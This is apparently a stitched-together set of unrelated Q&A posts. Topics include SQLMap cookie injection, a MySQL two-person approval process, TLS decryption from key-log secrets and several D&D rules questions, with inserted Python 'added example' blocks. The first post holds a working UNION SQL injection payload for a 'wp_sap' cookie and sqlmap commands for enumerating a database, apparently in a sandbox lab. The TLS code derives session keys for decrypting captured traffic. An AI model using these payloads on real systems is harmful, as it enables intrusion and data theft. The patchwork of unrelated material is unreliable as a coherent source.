SQLMap Cookie Injection with Working Manual SQLi

I’m using an existing exploit which calls for a cookie called wp_sap to be set with the following value:

["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] 

This works great manually. Now, I’d like to be able to use this within SQLMap to enumerate the database automatically but have been struggling. I’ve tried the following variations to no avail.

sqlmap --cookie "wp_sap=[\"1650149780')) OR 1=2 " -u http://sandbox.local -p "wp_sap" --dbms "MariaDB" --suffix "#]" --level 5 --technique U -proxy

sqlmap --cookie="wp_sap=*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --prefix "[\"1650149780')) OR 1=2" --suffix "11#]" --level 5 --technique U -proxy

sqlmap --cookie="wp_sap=[\"1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,*" -u http://sandbox.local -p "wp_sap" --dbms="MariaDB" --suffix ",11#]" --level 5 --technique U -proxy

I’d really appreciate some help to get this working.

Two-person rule on MySQL databases for “manual fixes”

In order to “harden” our compliance, we wanted to enforce a two-person rule on the MySQL production database for “manual fixes”. Such “manual fixes” frequently arise due to:

  • Bugs in the application (we are a fast company :D)
  • Various customer requests that do not have an application feature implemented yet, such as GDPR update requests, special discounts, etc.

We wanted a process that does not require the two persons to be physically side-by-side. One person is on-call, rather junior, and is responsible for translating customer service requests into SQL. They might need a GUI (such as MySQL Workbench) to navigate the complex data model and figure out the exact SQL script to produce. The SQL script should feature SELECTs showing the data before and after the change in a non-committed transaction (e.g., AUTOCOMMIT OFF and no COMMIT at the end).

The second person is not on-call, rather senior, and fairly familiar with the application’s data model. They should be able to look at the SQL script and the non-committed transaction output, and approve or reject via a mobile app during the evening.

We cannot be the first to have this or a similar requirement.

Does anyone know good documentation or tooling to implement such a process?

Here are some similar questions on the topic, but not quite as specific as the present one:

  • What can a company do against insiders going rogue and negatively affecting essential infrastructure?
  • How can two-man control be implemented efficiently?
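One way to implement the approval gate the question describes, as an added example that is not from the question or any tool it mentions: the junior engineer's script runs inside an open transaction with the before/after SELECTs captured, and the COMMIT is issued only when the senior approver's token matches a digest of the exact script and data they reviewed. It assumes an in-memory sqlite3 database standing in for MySQL, and the table, key and function names are constructed for the demo.

```python
import hashlib
import hmac
import json
import sqlite3

# Assumption: sqlite3 stands in for the MySQL production database so this runs
# offline; the flow is the same on any DB-API connection with autocommit off,
# since no COMMIT is issued until the approver's token has been verified.
APPROVER_KEY = b"constructed-demo-key-held-only-by-the-senior-approver"

def stage_change(conn, check_sql, change_sql):
    """Run the fix in an open transaction and capture rows before and after.

    Nothing is committed here. The digest binds the exact script text to the
    exact data it produced, so the approver signs off on what actually ran.
    """
    cur = conn.cursor()
    cur.execute("BEGIN")
    before = cur.execute(check_sql).fetchall()
    cur.execute(change_sql)
    after = cur.execute(check_sql).fetchall()
    bundle = {"check_sql": check_sql, "change_sql": change_sql,
              "before": before, "after": after}
    digest = hashlib.sha256(json.dumps(bundle, sort_keys=True).encode()).hexdigest()
    bundle["digest"] = digest
    return bundle

def approve(digest, key=APPROVER_KEY):
    """The senior reviewer's approval: an HMAC over the digest they inspected."""
    return hmac.new(key, digest.encode(), hashlib.sha256).hexdigest()

def finalize(conn, bundle, token, key=APPROVER_KEY):
    """COMMIT only if the token matches this exact bundle, else ROLLBACK."""
    if hmac.compare_digest(approve(bundle["digest"], key), token):
        conn.commit()
        return "committed"
    conn.rollback()
    return "rolled back"

def demo_connection():
    """Constructed sample schema standing in for the production data model."""
    conn = sqlite3.connect(":memory:", isolation_level=None)
    conn.execute("CREATE TABLE customer (id INTEGER PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO customer VALUES (1, 'old@example.com')")
    return conn
```

Because the token covers the script text and the before/after rows, a script edited after approval, or the same script run against data that has since changed, produces a different digest and is rolled back.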

Manual TLS decryption with master secret

Assuming I have the master secret from SSLKEYLOGFILE, the client random, and the server random, can I decrypt any TLS traffic captured? I’ve started from Golang’s TLS implementation, pulled the connection stuff out, had it generate the keys and IV from the values above (https://github.com/golang/go/blob/cd18da451faedc4218a5fd0e38f9b3d13aa5da01/src/crypto/tls/prf.go#L121), but still can’t decrypt.

Thoughts? Is one able to generally decrypt any TLS (given correct version and cipher) with one instance implementation, like Golang’s?
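The derivation the question is reproducing, as an added example that is not the asker's code and not Go's crypto/tls: look up the master secret in SSLKEYLOGFILE, expand it with the TLS 1.2 PRF into the client/server write keys and IVs, and assemble the nonce and AAD an AES-GCM record needs. It assumes TLS 1.2 with a SHA-256 PRF and an AES-GCM suite; all sample values in the test are constructed.

```python
import hashlib
import hmac
# Added example, not the Go code from the question. Assumes TLS 1.2 with a
# SHA-256 PRF and an AES-GCM suite; every sample value is constructed.

def master_from_keylog(keylog_text, client_random):
    """Look up a session's master secret in SSLKEYLOGFILE by its client random."""
    for line in keylog_text.splitlines():
        fields = line.split()
        if (len(fields) == 3 and fields[0] == "CLIENT_RANDOM"
                and bytes.fromhex(fields[1]) == client_random):
            return bytes.fromhex(fields[2])
    return None

def p_hash(secret, seed, length, digest=hashlib.sha256):
    """P_<hash> from RFC 5246 s.5: A(i) = HMAC(secret, A(i-1)), A(0) = seed."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, digest).digest()
        out += hmac.new(secret, a + seed, digest).digest()
    return out[:length]

def key_block(master_secret, client_random, server_random, mac_len, key_len, iv_len):
    """Expand the master secret into the six write parameters (RFC 5246 s.6.3).
    Key expansion seeds the PRF with server_random + client_random, the reverse
    of the master-secret derivation (client + server); swapped randoms give
    well-formed keys that decrypt nothing."""
    need = 2 * (mac_len + key_len + iv_len)
    block = p_hash(master_secret, b"key expansion" + server_random + client_random, need)
    parts, pos = {}, 0
    for name, size in (("client_mac", mac_len), ("server_mac", mac_len),
                       ("client_key", key_len), ("server_key", key_len),
                       ("client_iv", iv_len), ("server_iv", iv_len)):
        parts[name], pos = block[pos:pos + size], pos + size
    return parts

def gcm_record_inputs(implicit_iv, seq_num, fragment, content_type=23, version=b"\x03\x03"):
    """Split a TLS 1.2 AES-GCM record body into (nonce, aad, ciphertext_with_tag).
    The 8-byte explicit nonce leads the fragment; the AAD covers the 64-bit
    sequence number, type, version and the plaintext length (RFC 5288 s.3)."""
    explicit_nonce, ct = fragment[:8], fragment[8:]
    plaintext_len = len(ct) - 16  # the 16-byte GCM tag is not counted
    aad = (seq_num.to_bytes(8, "big") + bytes([content_type]) + version
           + plaintext_len.to_bytes(2, "big"))
    return implicit_iv + explicit_nonce, aad, ct
```

For an AES-128-GCM suite call key_block with mac_len=0, key_len=16, iv_len=4, then pass the nonce, ciphertext and AAD from gcm_record_inputs (with client_key/client_iv for client-to-server records, the server pair for the other direction) to an AES-GCM decryptor such as the cryptography package's AESGCM(key).decrypt(nonce, ct, aad); the record sequence number starts at 0 per direction and is not on the wire.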

How do the damage rules from blogofholding’s “5e monster manual on a business card” work?

5e monster manual on a business card

Damage: This is the damage budget for all the monster’s attacks. Limited-use (daily, recharge, or situational) attacks do 4x the damage budgeted. Multi-target attacks do ½ the damage budgeted. Limited-use multi-target attacks do 2x. All other damage sources are 1 for 1, including at-will and legendary single-target attacks, auras, reactions, and variable-length effects like Swallow. If a monster has several at-will options (such as melee and ranged), the lower-damage options are free.

The example stat block that the author uses to illustrate these rules involves a low-level creature that can only make a single attack per round, and in this situation the rules seem to work out. I’m having more trouble figuring out how the rules work when you start throwing multiattack into the mix or when you get into the higher levels with powerful creatures that have legendary actions, for instance.

The Monster Manual lists the Adult Red Dragon as a CR 17 creature. According to the blog’s rules, this would give it a damage budget of 85. The dragon’s fire breath is a limited-use, multi-target attack that deals an average of 63 points of damage to those who fail their saves, so as per the rules this should use up 31 out of the 85 budget, leaving 54.

The legendary Wing Attack also falls into this category and so should use up 7 more of the budget, leaving 47.

The blog’s rules indicate that only the most powerful at-will attack, which is a 1 for 1 on the budget cost, requires any budget, which means that the Bite attack eats up 26 of the remaining budget, leaving 21.

Is this correct? Does the fact that the dragon has multiattack come into play in the budget calculations? Or is it that the dragon is a powerful creature and thus based on “concept” it should be up to 50% higher on the damage budget? In this case, we’re looking at a budget of up to 127, and then it seems like accounting for every attack available works out: 31 for the breath weapon, 7 for the wing attack, 26 for the bite, 15 x 2 for the claws, 17 for the tail, for a total of 111.

What resistances does an Imp have in recent printings of the Monster Manual?

My copy of the Player’s Handbook and my copy of the Monster Manual both state that an Imp has resistance to:

[…] bludgeoning, piercing, and slashing from nonmagical weapons that aren’t silvered.

And then DnD Beyond (without buying any books there) states:

[…] Bludgeoning, Piercing, and Slashing from Nonmagical Attacks that aren’t Silvered

Meanwhile the Player’s Handbook errata states:

bludgeoning, piercing, and slashing from nonmagical attacks not made with silvered weapons.

And the Monster Manual errata states:

Throughout the book, instances of “nonmagical weapons” in Damage Resistances/Immunities entries have been replaced with “nonmagical attacks.”

Applying this exact update would make my book state:

bludgeoning, piercing, and slashing from nonmagical attacks that aren’t silvered.

This matches DnD Beyond’s description but “attacks that aren’t silvered” sounds very off/wrong to me. I have no idea if this wording actually exists in the printings of the Monster Manual, it is just what the errata states.

Which of these wordings, if any, is correct; what is the wording in more/most recent printings of the Monster Manual? If this wording conflicts with the Player’s Handbook errata, which one takes precedence?

Web server attack methodology: why bother with manual tests if vulnerability scanner does it all?

I’m reading a white hat hacking book from a famous certification. They say the methodology for hacking a web server is:

  • information gathering (domain name, DNS, IP, etc.)
  • footprinting (ex: banner grabbing)
  • website mirroring
  • vulnerability scanning
  • session hijacking
  • password cracking

Apart from session hijacking and information gathering, I don’t see why I would not just launch Acunetix Web App Scanner and/or Nessus to find all weaknesses.

What is the point of performing manual tests if you can automate them?

For instance, if the vulnerability scanner does not know how to find vulnerable cookies, and if I manually find a way to do session hijacking, I won’t be able to train Acunetix or Nessus for that. Even if I did, I don’t know how beneficial it would be.

Please explain to me why I would not just let my tool do the hacking for me.

Can the manual and tome magic items that increase stats be used multiple times by bypassing the century wait time via the spell Sequester?

Assume we have a Wizard who is at least level 13 and can reliably cast Sequester many times (either through acquired spell scrolls, or has acquired enough material components for it to be a non-issue), has a safe place (through the spell Demiplane) to be under the influence of Sequester for many centuries, and has access to the Manual of Bodily Health, Manual of Gainful Exercise, Manual of Quickness of Action, Tome of Clear Thought, Tome of Leadership and Influence, and Tome of Understanding.

Per the item descriptions in the DMG:

…your [STAT] score increases by 2, as does your maximum for that score. The manual then loses its magic, but regains it in a century.

Now, normally this would be a once-in-a-lifetime use, or maybe twice (due to the lifespan of the races), but if a wizard used Sequester on themself, many years can pass without growing older:

…[willing target creature] falls into a state of suspended animation. Time ceases to flow for it, and it doesn’t grow older. You can set a condition for the spell to end [before the spell is dispelled by the caster].

So, assuming that time continues to flow for the magic items, but not for the sequestered wizard, can they study these books and take the necessary long rests, Sequester for a hundred years, “wake” from the Sequester, and then repeat an arbitrary-but-finite number of times for an arbitrarily high (but finite) improvement to their stats?

To end the cycle and escape the demiplane, the wizard would simply Plane Shift out:

…You can specify a target destination in general terms … and you appear in or near that destination.

Does 5e have a Manual of the planes?

I’m building a Warlock with an Archfey patron, and I want to read more about the Feywild. I remember the AD&D Manual of the planes and it had information from all the planes. Does 5e have one of these? If not, is there a place I can read in-depth about the Archfey and the Feywild? (Similar information on Hell, demon princes, and the Abyss would also be greatly appreciated.)